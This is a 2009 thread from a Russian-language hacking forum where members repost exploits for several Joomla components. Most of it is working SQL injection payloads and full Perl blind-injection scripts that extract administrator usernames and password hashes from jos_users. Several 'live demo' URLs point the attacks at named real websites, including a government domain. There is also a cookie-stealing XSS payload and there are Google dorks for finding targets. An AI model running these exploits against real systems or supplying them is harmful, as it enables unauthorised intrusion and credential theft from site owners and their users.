ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.06.2009, 10:57
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
Joomla Component com_jumi (fileid) Blind SQL Injection Exploit
------------------------------------------------------------------------------
Joomla Component com_jumi (fileid) Blind SQL-injection Vulnerability
------------------------------------------------------------------------------
################################################## ###
# [+] Author : Chip D3 Bi0s #
# [+] Email : chipdebios[alt+64]gmail.com #
# [+] Vulnerability : Blind SQL injection #
################################################## ###
Example:
Код:
http://localHost/path/index.php?option=com_jumi&fileid=n<Sql Code>
n=number fileid valid
<Sql code>:
Код:
'+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/* '+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/* /index.php?option=com_jumi&fileid=2'+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...
DEMO LIVE:
Код:
http://www.elciudadano.gov.ec/index.php?option=com_jumi&fileid=2'+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+jos_users+limit+0,1),1,1))=101/*
etc, etc....
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
if you want to save the work, you can use the following script
-------------------------------
PHP код:
#!/usr/bin/perl -w use LWP::UserAgent; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jumi (fileid) Blind SQL-injection \n\n"; print "\t\t-----------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path: "; chomp(my $target=<STDIN>); print " [-] Introduce fileid: "; chomp($z=<STDIN>); print " [+] Password: "; $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); for ($x=1;$x<=32;$x++) #x limit referido a la posicion del caracter { #c referido a ascci 48-57, 97-102 for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jumi&fileid=".$z."'+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c."/*"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = "com_"; # print "limit:"; # print "$x"; # print "; assci:"; # print "$c;"; if ($content =~ /$regexp/) {$char=chr($c); print "$char";} } }
# milw0rm.com [2009-06-15]
Последний раз редактировалось swt1; 16.06.2009 в 11:00..
|
|
|
16.06.2009, 10:58
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
Joomla Component com_ijoomla_rss Blind SQL Injection Exploit
Код:
#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print " \n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; print " o Joomla Component com_ijoomla_rss Blind SQL Injection Exploit o\n"; print " o Author:xoron o\n"; print " o More info:http://joomla15.ijoomlademo.com o\n"; print " o vendor:http://ijoomlademo.com o\n"; print " o Dork : com_ijoomla_rss o\n"; print " o Usage: perl bachir.pl host path <options> o\n"; print " o Example: perl bachir.pl www.host.com /joomla/ -s 2 o\n"; print " ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n"; exit; } my $host = $ARGV[0]; my $path = $ARGV[1]; my $userid = 1; my $sid = $ARGV[2]; my %options = (); GetOptions(\%options, "u=i", "s=i"); print "[~] Exploiting...\n"; if($options{"u"}) { $userid = $options{"u"}; } if($options{"s"}) { $sid = $options{"s"}; } syswrite(STDOUT, "[~] MD5-Hash: ", 14); for(my $i = 1; $i <= 32; $i++) { my $f = 0; my $h = 48; while(!$f && $h <= 57) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } if(!$f) { $h = 97; while(!$f && $h <= 122) { if(istrue2($host, $path, $userid, $sid, $i, $h)) { $f = 1; syswrite(STDOUT, chr($h), 1); } $h++; } } } print "\n[~] Exploiting done\n"; sub istrue2 { my $host = shift; my $path = shift; my $uid = shift; my $sid = shift; my $i = shift; my $h = shift; my $ua = LWP::UserAgent->new; my $query = "http://".$host.$path."index.php?option=com_ijoomla_rss&act=xml&cat=".$sid." and SUBSTRING((SELECT password FROM jos_users LIMIT 0,1 ),".$i.",1)=char(".$h.")"; my $resp = $ua->get($query); my $content = $resp->content; my $regexp = "seminar_boxA"; if($content =~ /$regexp/) { return 1; } else { return 0; } }
# milw0rm.com [2009-06-15]
|
|
|
|
22.06.2009, 23:53
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
Joomla Component com_tickets <= 2.1 (id) SQL Injection Vuln
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
Joomla Component com_tickets (id) SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
################################################## #
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + x_jeshua + eCORE + rayok3nt
[+] Vulnerability : SQL injection
################################################## #
Info component:
ššššššššššššššš
Name : Tickets
Version : 0.1 & 2.1
Author : Paul Coogan
Author email : paul@ideabuzz.com
Web author : http://www.ideabuzz.com
################################################## #
Код:
Example: http://localHost/path/index.php?option=com_tickets&task=form&id=n[SQL code]
n = id valid
Demo Live Joomla : version 2.1
šššššššššššššššššššššššššššššš
Код:
http://www.helendaleeducationfoundation.org/index.php?option=com_tickets&task=form&id=1+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users/*
Demo Live Mambo : Version 0.1
ššššššššššššššššššššššššššššš
Код:
http://www.narip.com/index.php?option=com_tickets&task=form&id=68+and+1=2+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mos_users/*
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2009-06-22]
|
|
|
|
30.06.2009, 17:11
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500
Репутация:
930
|
|
com_svmap
Вот наткнулся случайно. Может кто доведет до ума, если, конечно, есть что доводить.
Код:
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
|
|
|
|
30.06.2009, 17:52
|
|
Познающий
Регистрация: 04.01.2009
Сообщений: 94
Провел на форуме:
404716
Репутация:
145
|
|
Сообщение от Fata1ex
com_svmap
Вот наткнулся случайно. Может кто доведет до ума, если, конечно, есть что доводить.
Код:
www.allegra.as/index.php?option=com_svmap&id=-1&user_id=1&type=1&Itemid=2
если не ошибаюсь это не дыра
просто ошибка в обработке данных
|
|
|
|
SQL-Injection в компоненте doQment под joomla |
08.07.2009, 15:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
SQL-Injection в компоненте doQment под joomla
SQL-Injection в компоненте doQment под joomla
Vulnerability : уязвимый параметр cid=
Example:
Код:
http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92
Dork: inurl:com_doqment + cid=
# shell_c0de
Последний раз редактировалось shell_c0de; 08.07.2009 в 15:53..
|
|
|
|
28.07.2009, 17:48
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203
Репутация:
704
|
|
Joomla Almond Classifieds Component SQL Injection and Cross-Site Scripting
Description:
Moudi has reported some vulnerabilities in the Almond Classifieds component for Joomla, which can be exploited by malicious people to conduct SQL injection and cross-site scripting attacks.
1) Input passed via the "replid" to index.php (when "option" is set to "com_aclassf", "Itemid" is set to a valid id, "ct" to "manw_repl" and "md" is set to "add_form") is not properly sanitised before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "addr" parameter to components/com_aclassf/gmap.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 7.5. Other versions may also be affected.
Код:
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ /___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[�] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[�] Joomla Component v.7.5 (com_aclassf) Multiple Remote Vulnerabilities
==============================================================================
[�] Script: [ Joomla Almond Classifieds v.7.5 ]
[�] Language: [ PHP ]
[�] Download: [ http://www.almondsoft.com ]
[�] Founder: [ Moudi <m0udi@9.cn> ]
[�] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[�] Team: [ EvilWay ]
[�] Dork: [ OFF ]
[�] Price: [ $195 ]
[�] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
[�] http://www.site.com/patch/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=[BLIND]
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=1 <= TRUE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438 and 1=2 <= FALSE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> TRUE
[�] http://www.almondsoft.com/j/index.php?option=com_aclassf&Itemid=53&ct=manw_repl&md=add_form&replid=11438+AND SUBSTRING(@@version,1,1)=5
=> FALSE
===[ Exploit XSS + LIVE : vulnerability ]===
[�] http://www.site.com/patch/components/com_aclassf/gmap.php?addr=[XSS]
[�] http://www.almondsoft.com/j/components/com_aclassf/gmap.php?addr="><script>alert(document.cookie);</script>
Author: Moudi
###########################################################################
|
|
|
|
Joomla component com_fireboard SQL-inj |
29.07.2009, 14:55
|
|
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394
Репутация:
74
|
|
Joomla component com_fireboard SQL-inj
Joomla component com_fireboard SQL-inj
Уязвимый параметр func
Код:
?func=who',%20userid=123,%20link=(SELECT %20jos_users.password%20FROM%20jos_users%20WHERE%20jos_users.id=123)%20--%20a
Более подробно смотрим сюда
http://forum.antichat.ru/threadnav130926-1-10.html
и вот сюда
http://forum.antichat.ru/showpost.php?p=1409117&postcount=33
|
|
|
|
02.08.2009, 10:57
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++ Joomla Component com_jfusion (Itemid) Blind SQL-injection Vulnerability
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++
################################################## #
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Vulnerability : Blind SQL injection
################################################## #
Example:
Код:
http://localHost/path/index.php?option=com_jfusion&Itemid=n[Sql Code] n:valid Itemid
Sql code:
Код:
+and+(select+substring(concat(1,password),1,1)+from+jos_users+limit+0,1)=1/*
etc, etc...
DEMO LIVE:
Код:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+(select+substring(concat(1,username),1,1)+from+jos_users+limit+0,1)=1
Код:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=97 !False ¡¡¡¡
Код:
http://www.cd7.com.ec/index.php?option=com_jfusion&Itemid=66+and+ascii(substring((SELECT+concat(password,0x3a,username)+from+jos_users+limit+0,1),1,1))=98 ¡True ¡¡¡¡
etc, etc...
# milw0rm.com [2009-08-01]
Последний раз редактировалось swt1; 02.08.2009 в 11:01..
|
|
|
|
02.08.2009, 10:58
|
|
Постоянный
Регистрация: 16.02.2008
Сообщений: 395
Провел на форуме:
3370466
Репутация:
96
|
|
http://wwww.host.org/Path : http://www.cd7.com.ec/
[-] Introduce Itemid : 66
[-] Introduce coincidencia : http://www.cd7.com.ec/forum/
+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++
PHP код:
#!/usr/bin/perl -w use LWP::UserAgent; use Benchmark; my $t1 = new Benchmark; print "\t\t-------------------------------------------------------------\n\n"; print "\t\t | Chip d3 Bi0s | \n\n"; print "\t\t Joomla Component com_jfusion (Itemid) Blind SQL-injection \n\n"; print "\t\t-------------------------------------------------------------\n\n"; print "http://wwww.host.org/Path : ";chomp(my $target=<STDIN>); print " [-] Introduce Itemid : ";chomp($z=<STDIN>); print " [-] Introduce coincidencia : ";chomp($w=<STDIN>); $column_name="concat(password)"; $table_name="jos_users"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); print "----------------Inyectando----------------\n"; #es Vulnerable? $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=1"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+1=2"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";} else {print " [-] Vulnerable :)\n"; for ($x=1;$x<=32;$x++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))>57"; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}#para alininear 0..9 con los 10-32 if ($content =~ /$regexp/) { for ($c=97;$c<=102;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;} } } else { for ($c=48;$c<=57;$c++) { $host = $target . "/index.php?option=com_jfusion&Itemid=".$z."+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+limit+0,1),".$x.",1))=".$c." "; my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w; if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;} } } } print " [+] Password :"." ".join('', @caracter) . "\n"; my $t2 = new Benchmark; my $tt = timediff($t2, $t1); print "El script tomo:",timestr($tt),"\n"; } } else {print " [-] Exploit Fallo :(\n";}
# milw0rm.com [2009-08-01]
Последний раз редактировалось swt1; 02.08.2009 в 11:25..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
